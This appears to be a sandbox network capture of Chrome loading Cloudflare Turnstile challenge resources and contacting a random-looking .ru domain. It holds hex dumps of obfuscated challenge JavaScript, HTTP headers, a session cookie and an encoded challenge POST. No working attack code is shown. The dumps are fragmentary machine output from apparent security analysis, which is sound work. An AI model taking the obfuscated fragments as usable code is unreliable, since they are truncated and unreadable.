                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 69 3e 6a 7d 2c 27 43 4d 6c 7a 57 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 69 63 29 7b 72 65 74 75 72 6e 20 69 63 3d 62 2c 65 5b 69 63 28 31 33 36 35 29 5d 28 69 2c 6a 29 7d 2c 27 4f 64 7a 4a 55 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 6a 7c 69 7d 2c 27 73 4b 4d 6e 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 69 64 29 7b 72 65 74 75 72 6e 20 69 64 3d 62 2c 65 5b 69 64 28 31 32 37 36 29 5d 28 69 2c 6a 29 7d 7d 2c 65 5b 69 65 28 37 33 36 29 5d 28 69 65 28 32 32 31 30 29 2c 69 65 28 32 31 37 32 29 29 29 65 5b 69 65 28 37 33 36 29 5d 28 65 5b 69 65 28 34 37 30 29 5d 28 2b 2b 66 2c 34 29 2c 30 29 26 26 28 69 28 29 2c 6a 3d 30 29 3b 65 6c 73 65 20 69 66 28 66 77 5b 65 5b 69 65 28 32
                                                                                                                                                              Data Ascii: on(i,j){return i>j},'CMlzW':function(i,j,ic){return ic=b,e[ic(1365)](i,j)},'OdzJU':function(i,j){return j|i},'sKMnl':function(i,j,id){return id=b,e[id(1276)](i,j)}},e[ie(736)](ie(2210),ie(2172)))e[ie(736)](e[ie(470)](++f,4),0)&&(i(),j=0);else if(fw[e[ie(2
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 2b 66 77 5b 69 67 28 36 33 31 29 5d 5b 69 67 28 31 37 33 38 29 5d 2b 27 2f 27 2c 66 77 5b 69 67 28 36 33 31 29 5d 5b 69 67 28 31 36 34 35 29 5d 29 2b 27 2f 27 2b 66 77 5b 69 67 28 36 33 31 29 5d 5b 69 67 28 32 32 38 30 29 5d 2c 6e 3d 6e 65 77 20 66 77 5b 28 69 67 28 31 39 30 31 29 29 5d 28 29 2c 21 6e 29 72 65 74 75 72 6e 3b 6f 3d 69 67 28 31 36 31 30 29 2c 6e 5b 69 67 28 31 36 33 37 29 5d 28 6f 2c 6d 2c 21 21 5b 5d 29 2c 6e 5b 69 67 28 31 30 38 33 29 5d 3d 32 35 30 30 2c 6e 5b 69 67 28 31 38 34 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6e 5b 69 67 28 38 33 32 29 5d 28 69 67 28 31 30 32 30 29 2c 6a 5b 69 67 28 32 31 39 37 29 5d 29 2c 73 3d 7b 7d 2c 73 5b 69 67 28 31 37 38 36 29 5d 3d 66 2c 73 2e 63 63 3d 67 2c 73 5b 69 67 28 34 34 33 29 5d 3d 6b
                                                                                                                                                              Data Ascii: +fw[ig(631)][ig(1738)]+'/',fw[ig(631)][ig(1645)])+'/'+fw[ig(631)][ig(2280)],n=new fw[(ig(1901))](),!n)return;o=ig(1610),n[ig(1637)](o,m,!![]),n[ig(1083)]=2500,n[ig(1846)]=function(){},n[ig(832)](ig(1020),j[ig(2197)]),s={},s[ig(1786)]=f,s.cc=g,s[ig(443)]=k
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 52 6a 4f 79 74 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 4c 48 48 63 54 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 79 57 55 69 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 5e 6c 7d 2c 27 56 6d 4b 45 62 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 48 74 6c 75 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 79 68 78 7a 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 76 51 45
                                                                                                                                                              Data Ascii: tion(l,m,n){return l(m,n)},'RjOyt':function(l,m){return l-m},'LHHcT':function(l,m,n){return l(m,n)},'yWUim':function(l,m){return m^l},'VmKEb':function(l,m,n){return l(m,n)},'Htlue':function(l,m,n){return l(m,n)},'yhxzL':function(l,m,n){return l(m,n)},'vQE
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 7b 7d 2c 75 5b 69 70 28 34 34 33 29 5d 3d 6f 5b 69 70 28 31 33 33 35 29 5d 2c 75 5b 69 70 28 35 39 35 29 5d 3d 45 5b 69 70 28 36 33 31 29 5d 5b 69 70 28 31 30 37 30 29 5d 2c 75 5b 69 70 28 36 33 32 29 5d 3d 6f 5b 69 70 28 39 39 30 29 5d 2c 75 5b 69 70 28 31 33 35 35 29 5d 3d 46 5b 69 70 28 36 33 31 29 5d 5b 69 70 28 31 32 36 33 29 5d 2c 75 5b 69 70 28 31 35 35 32 29 5d 3d 47 2c 75 5b 69 70 28 37 30 35 29 5d 3d 48 5b 69 70 28 36 33 31 29 5d 5b 69 70 28 31 32 39 34 29 5d 2c 75 5b 69 70 28 38 39 31 29 5d 3d 49 5b 69 70 28 36 33 31 29 5d 5b 69 70 28 31 38 37 35 29 5d 2c 44 5b 69 70 28 31 36 36 39 29 5d 5b 69 70 28 34 37 33 29 5d 28 75 2c 27 2a 27 29 29 3b 72 65 74 75 72 6e 7d 7d 2c 32 35 30 2a 66 5b 69 6f 28 31 39 35 38 29 5d 28 65 2c 31 29 29 7d 2c 69 3d 6e
                                                                                                                                                              Data Ascii: {},u[ip(443)]=o[ip(1335)],u[ip(595)]=E[ip(631)][ip(1070)],u[ip(632)]=o[ip(990)],u[ip(1355)]=F[ip(631)][ip(1263)],u[ip(1552)]=G,u[ip(705)]=H[ip(631)][ip(1294)],u[ip(891)]=I[ip(631)][ip(1875)],D[ip(1669)][ip(473)](u,'*'));return}},250*f[io(1958)](e,1))},i=n
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 3d 45 2c 45 3d 76 2c 76 3d 62 46 28 77 2c 78 29 2c 77 3d 47 2c 47 3d 44 2c 44 3d 62 47 2c 66 5b 69 71 28 31 37 34 33 29 5d 28 62 49 2c 78 2c 42 29 29 7d 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 44 3d 49 5b 31 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 45 3d 49 5b 35 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 49 5b 37 5d 3d 62 69 28 46 2c 49 5b 37 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 49 5b 32 5d 3d 62 64 28 47 2c 49 5b 32 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 49 5b 36 5d 3d 62 68 28 75 2c 49 5b 36 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 31 27 3a 49 5b 34 5d 3d 62 66 28 76 2c 49 5b 34 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 49 5b 31 5d
                                                                                                                                                              Data Ascii: =E,E=v,v=bF(w,x),w=G,G=D,D=bG,f[iq(1743)](bI,x,B))}continue;case'6':D=I[1];continue;case'7':E=I[5];continue;case'8':I[7]=bi(F,I[7]);continue;case'9':I[2]=bd(G,I[2]);continue;case'10':I[6]=bh(u,I[6]);continue;case'11':I[4]=bf(v,I[4]);continue;case'12':I[1]
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 2c 66 77 5b 69 6d 28 36 33 31 29 5d 5b 69 6d 28 31 36 34 35 29 5d 29 2c 69 5b 69 6d 28 31 34 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 73 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 45 2c 75 2c 76 2c 77 2c 78 29 7b 69 66 28 69 73 3d 69 6d 2c 6c 3d 7b 27 41 6c 44 62 68 27 3a 66 75 6e 63 74 69 6f 6e 28 42 2c 43 2c 69 72 29 7b 72 65 74 75 72 6e 20 69 72 3d 62 2c 66 5b 69 72 28 33 35 34 29 5d 28 42 2c 43 29 7d 7d 2c 6d 3d 69 73 28 35 37 37 29 2c 69 5b 69 73 28 32 31 33 39 29 5d 21 3d 34 29 72 65 74 75 72 6e 3b 69 66 28 6e 3d 74 68 69 73 5b 69 73 28 32 32 36 32 29 5d 28 66 5b 69 73 28 31 35 37 30 29 5d 29 2c 66 5b 69 73 28 35 38 34 29 5d 28 6e 2c 69 73 28 32 30 36 33 29 29 29 7b 69 66 28 66 5b 69 73 28 31 34 36 36 29 5d 28 66 5b 69 73 28 31 39 36 34 29 5d 2c 66 5b 69
                                                                                                                                                              Data Ascii: ,fw[im(631)][im(1645)]),i[im(1403)]=function(is,l,m,n,o,s,E,u,v,w,x){if(is=im,l={'AlDbh':function(B,C,ir){return ir=b,f[ir(354)](B,C)}},m=is(577),i[is(2139)]!=4)return;if(n=this[is(2262)](f[is(1570)]),f[is(584)](n,is(2063))){if(f[is(1466)](f[is(1964)],f[i
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 37 30 29 5d 3f 66 5b 69 73 28 32 30 38 39 29 5d 28 78 2c 64 29 3a 64 28 29 29 29 7d 2c 6b 3d 68 59 5b 69 6d 28 35 31 31 29 5d 28 4a 53 4f 4e 5b 69 6d 28 36 33 35 29 5d 28 64 29 29 5b 69 6d 28 31 36 35 37 29 5d 28 27 2b 27 2c 66 5b 69 6d 28 31 32 34 38 29 5d 29 2c 69 5b 69 6d 28 34 36 30 29 5d 28 66 5b 69 6d 28 34 31 39 29 5d 28 27 76 5f 27 2c 66 77 5b 69 6d 28 36 33 31 29 5d 5b 69 6d 28 31 37 33 38 29 5d 29 2b 27 3d 27 2b 6b 29 7d 2c 66 41 3d 7b 7d 2c 66 41 5b 69 61 28 31 31 37 31 29 5d 3d 69 61 28 31 34 32 36 29 2c 66 41 5b 69 61 28 32 30 37 34 29 5d 3d 69 61 28 31 35 30 32 29 2c 66 41 5b 69 61 28 31 35 33 30 29 5d 3d 69 61 28 31 35 39 32 29 2c 66 41 5b 69 61 28 31 39 37 35 29 5d 3d 69 61 28 31 36 34 31 29 2c 66 41 5b 69 61 28 35 32 39 29 5d 3d 69 61 28
                                                                                                                                                              Data Ascii: 70)]?f[is(2089)](x,d):d()))},k=hY[im(511)](JSON[im(635)](d))[im(1657)]('+',f[im(1248)]),i[im(460)](f[im(419)]('v_',fw[im(631)][im(1738)])+'='+k)},fA={},fA[ia(1171)]=ia(1426),fA[ia(2074)]=ia(1502),fA[ia(1530)]=ia(1592),fA[ia(1975)]=ia(1641),fA[ia(529)]=ia(
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 69 61 28 31 35 33 30 29 5d 3d 69 61 28 31 39 35 32 29 2c 66 43 5b 69 61 28 31 39 37 35 29 5d 3d 69 61 28 31 35 31 39 29 2c 66 43 5b 69 61 28 35 32 39 29 5d 3d 69 61 28 32 30 37 32 29 2c 66 43 5b 69 61 28 31 38 37 37 29 5d 3d 69 61 28 32 31 38 34 29 2c 66 43 5b 69 61 28 32 32 33 32 29 5d 3d 69 61 28 31 34 39 31 29 2c 66 43 5b 69 61 28 31 39 39 35 29 5d 3d 69 61 28 31 36 36 33 29 2c 66 43 5b 69 61 28 31 39 33 37 29 5d 3d 69 61 28 31 36 33 30 29 2c 66 43 5b 69 61 28 31 39 37 38 29 5d 3d 69 61 28 38 35 38 29 2c 66 43 5b 69 61 28 33 37 31 29 5d 3d 69 61 28 32 32 30 34 29 2c 66 43 5b 69 61 28 31 39 32 37 29 5d 3d 69 61 28 31 35 37 34 29 2c 66 43 5b 69 61 28 31 38 30 30 29 5d 3d 69 61 28 31 39 38 38 29 2c 66 43 5b 69 61 28 31 32 39 35 29 5d 3d 69 61 28 39 37 39
                                                                                                                                                              Data Ascii: ia(1530)]=ia(1952),fC[ia(1975)]=ia(1519),fC[ia(529)]=ia(2072),fC[ia(1877)]=ia(2184),fC[ia(2232)]=ia(1491),fC[ia(1995)]=ia(1663),fC[ia(1937)]=ia(1630),fC[ia(1978)]=ia(858),fC[ia(371)]=ia(2204),fC[ia(1927)]=ia(1574),fC[ia(1800)]=ia(1988),fC[ia(1295)]=ia(979
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 3d 69 61 28 37 34 38 29 2c 66 45 5b 69 61 28 33 37 31 29 5d 3d 69 61 28 34 32 33 29 2c 66 45 5b 69 61 28 31 39 32 37 29 5d 3d 69 61 28 33 38 36 29 2c 66 45 5b 69 61 28 31 38 30 30 29 5d 3d 69 61 28 36 35 36 29 2c 66 45 5b 69 61 28 31 32 39 35 29 5d 3d 69 61 28 32 32 31 34 29 2c 66 45 5b 69 61 28 35 35 36 29 5d 3d 69 61 28 38 33 34 29 2c 66 45 5b 69 61 28 34 37 39 29 5d 3d 69 61 28 33 37 38 29 2c 66 45 5b 69 61 28 31 35 37 39 29 5d 3d 69 61 28 31 34 33 30 29 2c 66 45 5b 69 61 28 32 31 33 33 29 5d 3d 69 61 28 31 37 32 30 29 2c 66 45 5b 69 61 28 34 31 34 29 5d 3d 69 61 28 35 37 33 29 2c 66 45 5b 69 61 28 38 34 34 29 5d 3d 69 61 28 37 30 33 29 2c 66 45 5b 69 61 28 31 31 31 35 29 5d 3d 69 61 28 39 30 39 29 2c 66 45 5b 69 61 28 31 31 36 34 29 5d 3d 69 61 28 31
                                                                                                                                                              Data Ascii: =ia(748),fE[ia(371)]=ia(423),fE[ia(1927)]=ia(386),fE[ia(1800)]=ia(656),fE[ia(1295)]=ia(2214),fE[ia(556)]=ia(834),fE[ia(479)]=ia(378),fE[ia(1579)]=ia(1430),fE[ia(2133)]=ia(1720),fE[ia(414)]=ia(573),fE[ia(844)]=ia(703),fE[ia(1115)]=ia(909),fE[ia(1164)]=ia(1


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              12192.168.2.449750104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:04 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:04 UTC248INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:04 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470083f1d73424a-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:04 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                              Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                                                              2024-01-17 16:39:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              13192.168.2.449751104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:05 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:05 UTC248INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:05 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008426fb94350-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:05 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                              Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                                                              2024-01-17 16:39:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              14192.168.2.449752172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:06 UTC630OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:06 UTC653INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:06 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, no-cache, max-age=0
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9GwSSkYMo178kButyz32jlFvXFXyc0jsaLG9pP6Vz2pv4%2Fb4cKwYHKz0wzJsq4kWAUVGpYZGM%2B87tChGA2CdA1Hyh9K1k0XQHGEr8O2%2BVf51ENqSMJGcR7LkNOj4M43CtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470084a891b428f-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:06 UTC716INData Raw: 34 38 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61
                                                                                                                                                              Data Ascii: 489<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica
                                                                                                                                                              2024-01-17 16:39:06 UTC452INData Raw: 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72
                                                                                                                                                              Data Ascii: 0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly power
                                                                                                                                                              2024-01-17 16:39:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              15192.168.2.449753104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:06 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1672084046:1705509045:1KRCh9wlmdHNe1_uWjab1xjgCNY1yb1dMySJtbe4upc/8470083bba6a4201/20178212f2891c9 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Content-Length: 2650
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              CF-Challenge: 20178212f2891c9
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:06 UTC2650OUTData Raw: 76 5f 38 34 37 30 30 38 33 62 62 61 36 61 34 32 30 31 3d 45 4f 32 64 79 64 52 64 54 64 2d 64 71 64 70 24 30 24 64 69 24 64 77 66 56 37 56 73 4c 72 56 39 24 56 48 4c 55 62 56 43 33 56 4c 36 4d 31 56 33 56 39 39 4c 74 56 73 45 68 52 56 4d 64 34 66 79 2d 36 56 35 64 34 72 31 6a 6e 64 58 44 54 32 4c 64 56 6b 56 44 64 58 48 25 32 62 56 69 42 39 56 58 58 64 68 48 56 53 49 64 65 57 73 64 34 32 56 30 6e 70 43 7a 4c 49 56 34 4f 4f 48 56 75 38 30 53 30 45 30 56 4c 79 56 70 64 58 74 32 65 45 54 4a 65 76 56 4e 61 37 4c 56 56 2b 56 68 53 54 58 32 66 56 72 64 4c 76 70 45 24 56 48 42 68 56 57 64 32 31 34 64 4c 2d 56 64 34 37 56 63 44 44 56 4c 36 56 37 36 58 53 6d 65 52 33 68 56 55 49 47 56 4c 58 56 30 52 7a 34 69 74 56 31 78 74 56 38 41 50 48 2d 6a 68 38 4f 66 69 77 56
                                                                                                                                                              Data Ascii: v_8470083bba6a4201=EO2dydRdTd-dqdp$0$di$dwfV7VsLrV9$VHLUbVC3VL6M1V3V99LtVsEhRVMd4fy-6V5d4r1jndXDT2LdVkVDdXH%2bViB9VXXdhHVSIdeWsd42V0npCzLIV4OOHVu80S0E0VLyVpdXt2eETJevVNa7LVV+VhSTX2fVrdLvpE$VHBhVWd214dL-Vd47VcDDVL6V76XSmeR3hVUIGVLXV0Rz4itV1xtV8APH-jh8OfiwV
                                                                                                                                                              2024-01-17 16:39:06 UTC647INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:06 GMT
                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cf-chl-gen: msBaNhR+BzjonkRPSP8Lk66dUtYd6TDHEdTBtLN5FdSrjoljZ6Hxp4V/9R1/uvMSCr+kXME4eMJkiCWGWNioGJQCOwkKq4NGdpk6cR3Y+CNSqqgSfdKQEgYoJqVlVtluf8lCOh1h+2g1P9/jHh2fkpHx9cNd04aMuzZR+wZz8w3sJJ/9lYJflN6WMD3WjrDR/nWUhfSC9BsUgOsLZNkxD0FG5oXaCAywEli1iTF1PBebPAyPDd1/mVMYVPLftvNsbPy4QOtlIiiX0AyI4SgTl16ZKCFDOURmugxkNw40a2r7bwkMQx4aCoYX5ez56XxMLu2SJhy5SKZ4QVcEXSeIQVbjEV6Jo1UD7sAVkVyXnQvnonbYS8XVOpcr+Hy3/esW$Y2q/9RzoAKFgCoNTi1Njvw==
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470084b4eca43b6-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
